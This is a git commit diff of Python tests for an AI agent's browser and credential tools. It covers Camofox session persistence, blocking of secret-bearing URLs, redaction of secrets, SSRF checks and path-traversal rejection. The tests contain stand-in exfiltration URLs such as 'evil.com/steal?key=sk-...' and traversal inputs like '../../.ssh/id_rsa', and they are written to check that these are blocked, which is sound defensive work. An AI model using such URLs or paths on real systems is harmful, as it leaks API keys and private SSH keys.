Merge branch 'main' into rewbs/tool-use-charge-to-subscription

2026-04-02 11:00:35 +11:00
parent 1b7473e702 bd9e0b605f
commit a2e56d044b
175 changed files with 18848 additions and 3772 deletions
--- a/tests/tools/test_browser_camofox.py
+++ b/tests/tools/test_browser_camofox.py
@@ -235,8 +235,13 @@ class TestCamofoxGetImages:
        mock_post.return_value = _mock_response(json_data={"tabId": "tab10", "url": "https://x.com"})
        camofox_navigate("https://x.com", task_id="t10")

+        # camofox_get_images parses images from the accessibility tree snapshot
+        snapshot_text = (
+            '- img "Logo"\n'
+            '  /url: https://x.com/img.png\n'
+        )
        mock_get.return_value = _mock_response(json_data={
-            "images": [{"src": "https://x.com/img.png", "alt": "Logo"}],
+            "snapshot": snapshot_text,
        })
        result = json.loads(camofox_get_images(task_id="t10"))
        assert result["success"] is True
--- a/tests/tools/test_browser_camofox_persistence.py
+++ b/tests/tools/test_browser_camofox_persistence.py
@@ -0,0 +1,242 @@
+"""Persistence tests for the Camofox browser backend.
+
+Tests that managed persistence uses stable identity while default mode
+uses random identity. The actual browser profile persistence is handled
+by the Camofox server (when CAMOFOX_PROFILE_DIR is set).
+"""
+
+import json
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from tools.browser_camofox import (
+    _drop_session,
+    _get_session,
+    _managed_persistence_enabled,
+    camofox_close,
+    camofox_navigate,
+    check_camofox_available,
+    cleanup_all_camofox_sessions,
+    get_vnc_url,
+)
+from tools.browser_camofox_state import get_camofox_identity
+
+
+def _mock_response(status=200, json_data=None):
+    resp = MagicMock()
+    resp.status_code = status
+    resp.json.return_value = json_data or {}
+    resp.raise_for_status = MagicMock()
+    return resp
+
+
+def _enable_persistence():
+    """Return a patch context that enables managed persistence via config."""
+    config = {"browser": {"camofox": {"managed_persistence": True}}}
+    return patch("tools.browser_camofox.load_config", return_value=config)
+
+
+@pytest.fixture(autouse=True)
+def _clear_session_state():
+    import tools.browser_camofox as mod
+    yield
+    with mod._sessions_lock:
+        mod._sessions.clear()
+    mod._vnc_url = None
+    mod._vnc_url_checked = False
+
+
+class TestManagedPersistenceToggle:
+    def test_disabled_by_default(self):
+        config = {"browser": {"camofox": {"managed_persistence": False}}}
+        with patch("tools.browser_camofox.load_config", return_value=config):
+            assert _managed_persistence_enabled() is False
+
+    def test_enabled_via_config_yaml(self):
+        config = {"browser": {"camofox": {"managed_persistence": True}}}
+        with patch("tools.browser_camofox.load_config", return_value=config):
+            assert _managed_persistence_enabled() is True
+
+    def test_disabled_when_key_missing(self):
+        config = {"browser": {}}
+        with patch("tools.browser_camofox.load_config", return_value=config):
+            assert _managed_persistence_enabled() is False
+
+    def test_disabled_on_config_load_error(self):
+        with patch("tools.browser_camofox.load_config", side_effect=Exception("fail")):
+            assert _managed_persistence_enabled() is False
+
+
+class TestEphemeralMode:
+    """Default behavior: random userId, no persistence."""
+
+    def test_session_gets_random_user_id(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        session = _get_session("task-1")
+        assert session["user_id"].startswith("hermes_")
+        assert session["managed"] is False
+
+    def test_different_tasks_get_different_user_ids(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        s1 = _get_session("task-1")
+        s2 = _get_session("task-2")
+        assert s1["user_id"] != s2["user_id"]
+
+    def test_session_reuse_within_same_task(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        s1 = _get_session("task-1")
+        s2 = _get_session("task-1")
+        assert s1 is s2
+
+
+class TestManagedPersistenceMode:
+    """With managed_persistence: stable userId derived from Hermes profile."""
+
+    def test_session_gets_stable_user_id(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        with _enable_persistence():
+            session = _get_session("task-1")
+            expected = get_camofox_identity("task-1")
+            assert session["user_id"] == expected["user_id"]
+            assert session["session_key"] == expected["session_key"]
+            assert session["managed"] is True
+
+    def test_same_user_id_after_session_drop(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        with _enable_persistence():
+            s1 = _get_session("task-1")
+            uid1 = s1["user_id"]
+            _drop_session("task-1")
+            s2 = _get_session("task-1")
+            assert s2["user_id"] == uid1
+
+    def test_same_user_id_across_tasks(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        with _enable_persistence():
+            s1 = _get_session("task-a")
+            s2 = _get_session("task-b")
+            # Same profile = same userId, different session keys
+            assert s1["user_id"] == s2["user_id"]
+            assert s1["session_key"] != s2["session_key"]
+
+    def test_different_profiles_get_different_user_ids(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        with _enable_persistence():
+            monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-a"))
+            s1 = _get_session("task-1")
+            uid_a = s1["user_id"]
+            _drop_session("task-1")
+
+            monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-b"))
+            s2 = _get_session("task-1")
+            assert s2["user_id"] != uid_a
+
+    def test_navigate_uses_stable_identity(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        requests_seen = []
+
+        def _capture_post(url, json=None, timeout=None):
+            requests_seen.append(json)
+            return _mock_response(
+                json_data={"tabId": "tab-1", "url": "https://example.com"}
+            )
+
+        with _enable_persistence(), \
+             patch("tools.browser_camofox.requests.post", side_effect=_capture_post):
+            result = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
+
+        assert result["success"] is True
+        expected = get_camofox_identity("task-1")
+        assert requests_seen[0]["userId"] == expected["user_id"]
+
+    def test_navigate_reuses_identity_after_close(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+
+        requests_seen = []
+
+        def _capture_post(url, json=None, timeout=None):
+            requests_seen.append(json)
+            return _mock_response(
+                json_data={"tabId": f"tab-{len(requests_seen)}", "url": "https://example.com"}
+            )
+
+        with (
+            _enable_persistence(),
+            patch("tools.browser_camofox.requests.post", side_effect=_capture_post),
+            patch("tools.browser_camofox.requests.delete", return_value=_mock_response()),
+        ):
+            first = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
+            camofox_close("task-1")
+            second = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
+
+        assert first["success"] is True
+        assert second["success"] is True
+        tab_requests = [req for req in requests_seen if "userId" in req]
+        assert len(tab_requests) == 2
+        assert tab_requests[0]["userId"] == tab_requests[1]["userId"]
+
+
+class TestVncUrlDiscovery:
+    """VNC URL is derived from the Camofox health endpoint."""
+
+    def test_vnc_url_from_health_port(self, monkeypatch):
+        monkeypatch.setenv("CAMOFOX_URL", "http://myhost:9377")
+        health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
+        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
+            assert check_camofox_available() is True
+        assert get_vnc_url() == "http://myhost:6080"
+
+    def test_vnc_url_none_when_headless(self, monkeypatch):
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        health_resp = _mock_response(json_data={"ok": True})
+        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
+            check_camofox_available()
+        assert get_vnc_url() is None
+
+    def test_vnc_url_rejects_invalid_port(self, monkeypatch):
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        health_resp = _mock_response(json_data={"ok": True, "vncPort": "bad"})
+        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
+            check_camofox_available()
+        assert get_vnc_url() is None
+
+    def test_vnc_url_only_probed_once(self, monkeypatch):
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
+        with patch("tools.browser_camofox.requests.get", return_value=health_resp) as mock_get:
+            check_camofox_available()
+            check_camofox_available()
+        # Second call still hits /health for availability but doesn't re-parse vncPort
+        assert get_vnc_url() == "http://localhost:6080"
+
+    def test_navigate_includes_vnc_hint(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        import tools.browser_camofox as mod
+        mod._vnc_url = "http://localhost:6080"
+        mod._vnc_url_checked = True
+
+        with patch("tools.browser_camofox.requests.post", return_value=_mock_response(
+            json_data={"tabId": "t1", "url": "https://example.com"}
+        )):
+            result = json.loads(camofox_navigate("https://example.com", task_id="vnc-test"))
+
+        assert result["vnc_url"] == "http://localhost:6080"
+        assert "vnc_hint" in result
--- a/tests/tools/test_browser_camofox_state.py
+++ b/tests/tools/test_browser_camofox_state.py
@@ -0,0 +1,66 @@
+"""Tests for Hermes-managed Camofox state helpers."""
+
+from unittest.mock import patch
+
+import pytest
+
+
+def _load_module():
+    from tools import browser_camofox_state as state
+    return state
+
+
+class TestCamofoxStatePaths:
+    def test_paths_are_profile_scoped(self, tmp_path):
+        state = _load_module()
+        with patch.object(state, "get_hermes_home", return_value=tmp_path):
+            assert state.get_camofox_state_dir() == tmp_path / "browser_auth" / "camofox"
+
+
+class TestCamofoxIdentity:
+    def test_identity_is_deterministic(self, tmp_path):
+        state = _load_module()
+        with patch.object(state, "get_hermes_home", return_value=tmp_path):
+            first = state.get_camofox_identity("task-1")
+            second = state.get_camofox_identity("task-1")
+            assert first == second
+
+    def test_identity_differs_by_task(self, tmp_path):
+        state = _load_module()
+        with patch.object(state, "get_hermes_home", return_value=tmp_path):
+            a = state.get_camofox_identity("task-a")
+            b = state.get_camofox_identity("task-b")
+            # Same user (same profile), different session keys
+            assert a["user_id"] == b["user_id"]
+            assert a["session_key"] != b["session_key"]
+
+    def test_identity_differs_by_profile(self, tmp_path):
+        state = _load_module()
+        with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-a"):
+            a = state.get_camofox_identity("task-1")
+        with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-b"):
+            b = state.get_camofox_identity("task-1")
+        assert a["user_id"] != b["user_id"]
+
+    def test_default_task_id(self, tmp_path):
+        state = _load_module()
+        with patch.object(state, "get_hermes_home", return_value=tmp_path):
+            identity = state.get_camofox_identity()
+            assert "user_id" in identity
+            assert "session_key" in identity
+            assert identity["user_id"].startswith("hermes_")
+            assert identity["session_key"].startswith("task_")
+
+
+class TestCamofoxConfigDefaults:
+    def test_default_config_includes_managed_persistence_toggle(self):
+        from hermes_cli.config import DEFAULT_CONFIG
+
+        browser_cfg = DEFAULT_CONFIG["browser"]
+        assert browser_cfg["camofox"]["managed_persistence"] is False
+
+    def test_config_version_unchanged(self):
+        from hermes_cli.config import DEFAULT_CONFIG
+
+        # managed_persistence is auto-merged by _deep_merge, no version bump needed
+        assert DEFAULT_CONFIG["_config_version"] == 11
--- a/tests/tools/test_browser_secret_exfil.py
+++ b/tests/tools/test_browser_secret_exfil.py
@@ -0,0 +1,186 @@
+"""Tests for secret exfiltration prevention in browser and web tools."""
+
+import json
+from unittest.mock import patch, MagicMock
+import pytest
+
+
+@pytest.fixture(autouse=True)
+def _ensure_redaction_enabled(monkeypatch):
+    """Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
+    monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
+    monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
+
+
+class TestBrowserSecretExfil:
+    """Verify browser_navigate blocks URLs containing secrets."""
+
+    def test_blocks_api_key_in_url(self):
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+        assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
+
+    def test_blocks_openrouter_key_in_url(self):
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+
+    def test_allows_normal_url(self):
+        """Normal URLs pass the secret check (may fail for other reasons)."""
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://github.com/NousResearch/hermes-agent")
+        parsed = json.loads(result)
+        # Should NOT be blocked by secret detection
+        assert "API key or token" not in parsed.get("error", "")
+
+
+class TestWebExtractSecretExfil:
+    """Verify web_extract_tool blocks URLs containing secrets."""
+
+    @pytest.mark.asyncio
+    async def test_blocks_api_key_in_url(self):
+        from tools.web_tools import web_extract_tool
+        result = await web_extract_tool(
+            urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
+        )
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+        assert "Blocked" in parsed["error"]
+
+    @pytest.mark.asyncio
+    async def test_allows_normal_url(self):
+        from tools.web_tools import web_extract_tool
+        # This will fail due to no API key, but should NOT be blocked by secret check
+        result = await web_extract_tool(urls=["https://example.com"])
+        parsed = json.loads(result)
+        # Should fail for API/config reason, not secret blocking
+        assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
+
+
+class TestBrowserSnapshotRedaction:
+    """Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
+
+    def test_extract_relevant_content_redacts_secrets(self):
+        """Snapshot containing secrets should be redacted before call_llm."""
+        from tools.browser_tool import _extract_relevant_content
+
+        # Build a snapshot with a fake Anthropic-style key embedded
+        fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
+        snapshot_with_secret = (
+            "heading: Dashboard Settings\n"
+            f"text: API Key: {fake_key}\n"
+            "button [ref=e5]: Save\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(snapshot_with_secret, "check settings")
+
+        assert len(captured_prompts) == 1
+        # The middle portion of the key must not appear in the prompt
+        assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
+        # Non-secret content should survive
+        assert "Dashboard" in captured_prompts[0]
+        assert "ref=e5" in captured_prompts[0]
+
+    def test_extract_relevant_content_no_task_redacts_secrets(self):
+        """Snapshot without user_task should also redact secrets."""
+        from tools.browser_tool import _extract_relevant_content
+
+        fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
+        snapshot_with_secret = (
+            f"text: OPENAI_API_KEY={fake_key}\n"
+            "link [ref=e2]: Home\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(snapshot_with_secret)
+
+        assert len(captured_prompts) == 1
+        assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
+
+    def test_extract_relevant_content_normal_snapshot_unchanged(self):
+        """Snapshot without secrets should pass through normally."""
+        from tools.browser_tool import _extract_relevant_content
+
+        normal_snapshot = (
+            "heading: Welcome\n"
+            "text: Click the button below to continue\n"
+            "button [ref=e1]: Continue\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Welcome page with continue button"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(normal_snapshot, "proceed")
+
+        assert len(captured_prompts) == 1
+        assert "Welcome" in captured_prompts[0]
+        assert "Continue" in captured_prompts[0]
+
+
+class TestCamofoxAnnotationRedaction:
+    """Verify annotation context is redacted before vision LLM call."""
+
+    def test_annotation_context_secrets_redacted(self):
+        """Secrets in accessibility tree annotation should be masked."""
+        from agent.redact import redact_sensitive_text
+
+        fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
+        annotation = (
+            "\n\nAccessibility tree (element refs for interaction):\n"
+            f"text: Token: {fake_token}\n"
+            "button [ref=e3]: Copy\n"
+        )
+        result = redact_sensitive_text(annotation)
+        assert "FAKEGITHUBTOKEN123456789" not in result
+        # Non-secret parts preserved
+        assert "button" in result
+        assert "ref=e3" in result
+
+    def test_annotation_env_dump_redacted(self):
+        """Env var dump in annotation context should be redacted."""
+        from agent.redact import redact_sensitive_text
+
+        fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
+        fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
+        annotation = (
+            "\n\nAccessibility tree (element refs for interaction):\n"
+            f"text: ANTHROPIC_API_KEY={fake_anth}\n"
+            f"text: OPENAI_API_KEY={fake_oai}\n"
+            "text: PATH=/usr/local/bin\n"
+        )
+        result = redact_sensitive_text(annotation)
+        assert "ANTHROPICFAKEKEY123456789" not in result
+        assert "OPENAIFAKEKEY99887766" not in result
+        assert "PATH=/usr/local/bin" in result
--- a/tests/tools/test_browser_ssrf_local.py
+++ b/tests/tools/test_browser_ssrf_local.py
@@ -0,0 +1,237 @@
+"""Tests that browser_navigate SSRF checks respect local-backend mode and
+the allow_private_urls setting.
+
+Local backends (Camofox, headless Chromium without a cloud provider) skip
+SSRF checks entirely — the agent already has full local-network access via
+the terminal tool.
+
+Cloud backends (Browserbase, BrowserUse) enforce SSRF by default.  Users
+can opt out for cloud mode via ``browser.allow_private_urls: true``.
+"""
+
+import json
+
+import pytest
+
+from tools import browser_tool
+
+
+def _make_browser_result(url="https://example.com"):
+    """Return a mock successful browser command result."""
+    return {"success": True, "data": {"title": "OK", "url": url}}
+
+
+# ---------------------------------------------------------------------------
+# Pre-navigation SSRF check
+# ---------------------------------------------------------------------------
+
+
+class TestPreNavigationSsrf:
+    PRIVATE_URL = "http://127.0.0.1:8080/dashboard"
+
+    @pytest.fixture()
+    def _common_patches(self, monkeypatch):
+        """Shared patches for pre-navigation tests that pass the SSRF check."""
+        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
+        monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
+        monkeypatch.setattr(
+            browser_tool,
+            "_get_session_info",
+            lambda task_id: {
+                "session_name": f"s_{task_id}",
+                "bb_session_id": None,
+                "cdp_url": None,
+                "features": {"local": True},
+                "_first_nav": False,
+            },
+        )
+        monkeypatch.setattr(
+            browser_tool,
+            "_run_browser_command",
+            lambda *a, **kw: _make_browser_result(),
+        )
+
+    # -- Cloud mode: SSRF active -----------------------------------------------
+
+    def test_cloud_blocks_private_url_by_default(self, monkeypatch, _common_patches):
+        """SSRF protection blocks private URLs in cloud mode."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
+
+        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
+
+        assert result["success"] is False
+        assert "private or internal address" in result["error"]
+
+    def test_cloud_allows_private_url_when_setting_true(self, monkeypatch, _common_patches):
+        """Private URLs pass in cloud mode when allow_private_urls is True."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
+
+        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
+
+        assert result["success"] is True
+
+    def test_cloud_allows_public_url(self, monkeypatch, _common_patches):
+        """Public URLs always pass in cloud mode."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
+
+        result = json.loads(browser_tool.browser_navigate("https://example.com"))
+
+        assert result["success"] is True
+
+    # -- Local mode: SSRF skipped ----------------------------------------------
+
+    def test_local_allows_private_url(self, monkeypatch, _common_patches):
+        """Local backends skip SSRF — private URLs are always allowed."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
+
+        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
+
+        assert result["success"] is True
+
+    def test_local_allows_public_url(self, monkeypatch, _common_patches):
+        """Local backends pass public URLs too (sanity check)."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
+
+        result = json.loads(browser_tool.browser_navigate("https://example.com"))
+
+        assert result["success"] is True
+
+
+# ---------------------------------------------------------------------------
+# _is_local_backend() unit tests
+# ---------------------------------------------------------------------------
+
+
+class TestIsLocalBackend:
+    def test_camofox_is_local(self, monkeypatch):
+        """Camofox mode counts as a local backend."""
+        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: True)
+        monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: "anything")
+
+        assert browser_tool._is_local_backend() is True
+
+    def test_no_cloud_provider_is_local(self, monkeypatch):
+        """No cloud provider configured → local backend."""
+        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
+        monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: None)
+
+        assert browser_tool._is_local_backend() is True
+
+    def test_cloud_provider_is_not_local(self, monkeypatch):
+        """Cloud provider configured and not Camofox → NOT local."""
+        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
+        monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: "bb")
+
+        assert browser_tool._is_local_backend() is False
+
+
+# ---------------------------------------------------------------------------
+# Post-redirect SSRF check
+# ---------------------------------------------------------------------------
+
+
+class TestPostRedirectSsrf:
+    PUBLIC_URL = "https://example.com/redirect"
+    PRIVATE_FINAL_URL = "http://192.168.1.1/internal"
+
+    @pytest.fixture()
+    def _common_patches(self, monkeypatch):
+        """Shared patches for redirect tests."""
+        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
+        monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
+        monkeypatch.setattr(
+            browser_tool,
+            "_get_session_info",
+            lambda task_id: {
+                "session_name": f"s_{task_id}",
+                "bb_session_id": None,
+                "cdp_url": None,
+                "features": {"local": True},
+                "_first_nav": False,
+            },
+        )
+
+    # -- Cloud mode: redirect SSRF active --------------------------------------
+
+    def test_cloud_blocks_redirect_to_private(self, monkeypatch, _common_patches):
+        """Redirects to private addresses are blocked in cloud mode."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(
+            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
+        )
+        monkeypatch.setattr(
+            browser_tool,
+            "_run_browser_command",
+            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
+        )
+
+        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
+
+        assert result["success"] is False
+        assert "redirect landed on a private/internal address" in result["error"]
+
+    def test_cloud_allows_redirect_to_private_when_setting_true(self, monkeypatch, _common_patches):
+        """Redirects to private addresses pass in cloud mode with allow_private_urls."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
+        monkeypatch.setattr(
+            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
+        )
+        monkeypatch.setattr(
+            browser_tool,
+            "_run_browser_command",
+            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
+        )
+
+        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
+
+        assert result["success"] is True
+        assert result["url"] == self.PRIVATE_FINAL_URL
+
+    # -- Local mode: redirect SSRF skipped -------------------------------------
+
+    def test_local_allows_redirect_to_private(self, monkeypatch, _common_patches):
+        """Redirects to private addresses pass in local mode."""
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(
+            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
+        )
+        monkeypatch.setattr(
+            browser_tool,
+            "_run_browser_command",
+            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
+        )
+
+        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
+
+        assert result["success"] is True
+        assert result["url"] == self.PRIVATE_FINAL_URL
+
+    def test_cloud_allows_redirect_to_public(self, monkeypatch, _common_patches):
+        """Redirects to public addresses always pass (cloud mode)."""
+        final = "https://example.com/final"
+        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
+        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
+        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
+        monkeypatch.setattr(
+            browser_tool,
+            "_run_browser_command",
+            lambda *a, **kw: _make_browser_result(url=final),
+        )
+
+        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
+
+        assert result["success"] is True
+        assert result["url"] == final
--- a/tests/tools/test_credential_files.py
+++ b/tests/tools/test_credential_files.py
@@ -197,3 +197,164 @@ class TestIterSkillsFiles:

        with patch.dict(os.environ, {"HERMES_HOME": str(hermes_home)}):
            assert iter_skills_files() == []
+
+class TestPathTraversalSecurity:
+    """Path traversal and absolute path rejection.
+
+    A malicious skill could declare::
+
+        required_credential_files:
+          - path: '../../.ssh/id_rsa'
+
+    Without containment checks, this would mount the host's SSH private key
+    into the container sandbox, leaking it to the skill's execution environment.
+    """
+
+    def test_dotdot_traversal_rejected(self, tmp_path, monkeypatch):
+        """'../sensitive' must not escape HERMES_HOME."""
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
+        (tmp_path / ".hermes").mkdir()
+
+        # Create a sensitive file one level above hermes_home
+        sensitive = tmp_path / "sensitive.json"
+        sensitive.write_text('{"secret": "value"}')
+
+        result = register_credential_file("../sensitive.json")
+
+        assert result is False
+        assert get_credential_file_mounts() == []
+
+    def test_deep_traversal_rejected(self, tmp_path, monkeypatch):
+        """'../../etc/passwd' style traversal must be rejected."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        # Create a fake sensitive file outside hermes_home
+        ssh_dir = tmp_path / ".ssh"
+        ssh_dir.mkdir()
+        (ssh_dir / "id_rsa").write_text("PRIVATE KEY")
+
+        result = register_credential_file("../../.ssh/id_rsa")
+
+        assert result is False
+        assert get_credential_file_mounts() == []
+
+    def test_absolute_path_rejected(self, tmp_path, monkeypatch):
+        """Absolute paths must be rejected regardless of whether they exist."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        # Create a file at an absolute path
+        sensitive = tmp_path / "absolute.json"
+        sensitive.write_text("{}")
+
+        result = register_credential_file(str(sensitive))
+
+        assert result is False
+        assert get_credential_file_mounts() == []
+
+    def test_legitimate_file_still_works(self, tmp_path, monkeypatch):
+        """Normal files inside HERMES_HOME must still be registered."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+        (hermes_home / "token.json").write_text('{"token": "abc"}')
+
+        result = register_credential_file("token.json")
+
+        assert result is True
+        mounts = get_credential_file_mounts()
+        assert len(mounts) == 1
+        assert "token.json" in mounts[0]["container_path"]
+
+    def test_nested_subdir_inside_hermes_home_allowed(self, tmp_path, monkeypatch):
+        """Files in subdirectories of HERMES_HOME must be allowed."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        subdir = hermes_home / "creds"
+        subdir.mkdir()
+        (subdir / "oauth.json").write_text("{}")
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        result = register_credential_file("creds/oauth.json")
+
+        assert result is True
+
+    def test_symlink_traversal_rejected(self, tmp_path, monkeypatch):
+        """A symlink inside HERMES_HOME pointing outside must be rejected."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        # Create a sensitive file outside hermes_home
+        sensitive = tmp_path / "sensitive.json"
+        sensitive.write_text('{"secret": "value"}')
+
+        # Create a symlink inside hermes_home pointing outside
+        symlink = hermes_home / "evil_link.json"
+        try:
+            symlink.symlink_to(sensitive)
+        except (OSError, NotImplementedError):
+            pytest.skip("Symlinks not supported on this platform")
+
+        result = register_credential_file("evil_link.json")
+
+        # The resolved path escapes HERMES_HOME — must be rejected
+        assert result is False
+        assert get_credential_file_mounts() == []
+
+
